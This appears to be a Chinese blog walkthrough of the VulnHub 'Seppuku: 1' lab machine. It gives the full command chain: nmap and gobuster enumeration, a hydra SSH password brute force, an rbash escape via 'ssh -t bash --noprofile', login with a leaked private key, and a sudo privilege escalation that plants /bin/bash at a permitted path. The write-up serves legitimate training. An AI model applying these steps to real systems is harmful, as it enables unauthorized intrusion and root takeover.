vulnhub Seppuku: 1

渗透思路:

nmap扫描 ---- gobuster扫描网站目录 ---- hydra爆破ssh密码 ---- ssh -t绕过rbash ---- 密码泄露切换到samurai,发现可以sudo提权,但提权用的命令不存在 ---- tanto用户私钥ssh登录,创建提权所需命令文件 ---- samurai用户sudo提权

环境信息:

靶机:192.168.101.86

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.86

扫出来一堆端口,其中80、7080、7601、8088都是http或者https

2、gobuster扫描网站目录

用gobuster扫描80、7080、7601、8088端口,只有7601端口扫描出有意义的目录(只有/w,/production,/keys,/secret下面有东西)

​gobuster dir -u http://192.168.101.86:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

3、在一堆兔子洞中找到系统用户名和密码字典

http://192.168.101.86:7601/w和http://192.168.101.86:7601/secret/下都有password.lst文件,是同一个密码字典,保存下来(以防万一不是同一个,我用的是http://192.168.101.86:7601/secret/password.lst

http://192.168.101.86:7601/secret/下的passwd.bak和shadow.bak都是兔子洞

http://192.168.101.86:7601/keys/下面两个私钥虽然不是兔子洞,不过暂时没用,先留着备用

真正的系统用户名在http://192.168.101.86:7601/secret/hostname里面

seppuku

4、hydra爆破ssh密码

用hydra爆破seppuku用户的ssh密码,密码字典来自http://192.168.101.86:7601/secret/password.lst

hydra -l seppuku -P "/home/kali/Downloads/password.lst" ssh://192.168.101.86

得到seppuku的密码eeyoree

ssh登录成功

ssh seppuku@192.168.101.86

5、ssh -t绕过rbash

seppuku用户ssh登录之后发现是rbash,不能切换目录

退出ssh登录,重新用如下命令登录

ssh seppuku@192.168.101.86 -t 'bash --noprofile'

成功绕过rbash

6、绕来绕去的sudo提权

(1)密码泄露切换到samurai,发现可以sudo提权

在seppuku的家目录下(/home/seppuku)发现一个.passwd文件,文件的属主是root,文件内容是

12345685213456!@!@A

目录切换到/home,发现另外两个用户的家目录

尝试以12345685213456!@!@A为密码,分别切换到用户root、samurai、tanto,只有samurai切换成功

su - samurai

切换成功后,查看samurai可以sudo执行什么命令

sudo -l

发现samurai可以以任何用户身份执行/home/tanto/.cgi_bin/bin /tmp/*

来到目录/home/tanto下,发现并没有.cgi_bin文件夹,而又只有tanto用户可以在自己的家目录下创建文件夹和文件,所以还得想办法用tanto用户登录。

(2)tanto用户私钥ssh登录,构造提权条件

这时想起来http://192.168.101.86:7601/keys/下还有两个私钥文件,我下载了private.bak,重命名为private,并用它作为tanto的私钥进行ssh登录,用-t参数绕过rbash

ssh tanto@192.168.101.86 -i private -t 'bash --noprofile'

输入如下命令创建/home/tanto/.cgi_bin/bin,使其内容为/bin/bash,并赋予可执行权限

tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo '/bin/bash' > bin
tanto@seppuku:~/.cgi_bin$ chmod +x bin

(3)samurai进行sudo提权

samurai的shell中执行如下命令,sudo提权到root,并在/root文件夹下找到root.txt

sudo /home/tanto/.cgi_bin/bin /tmp/*

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值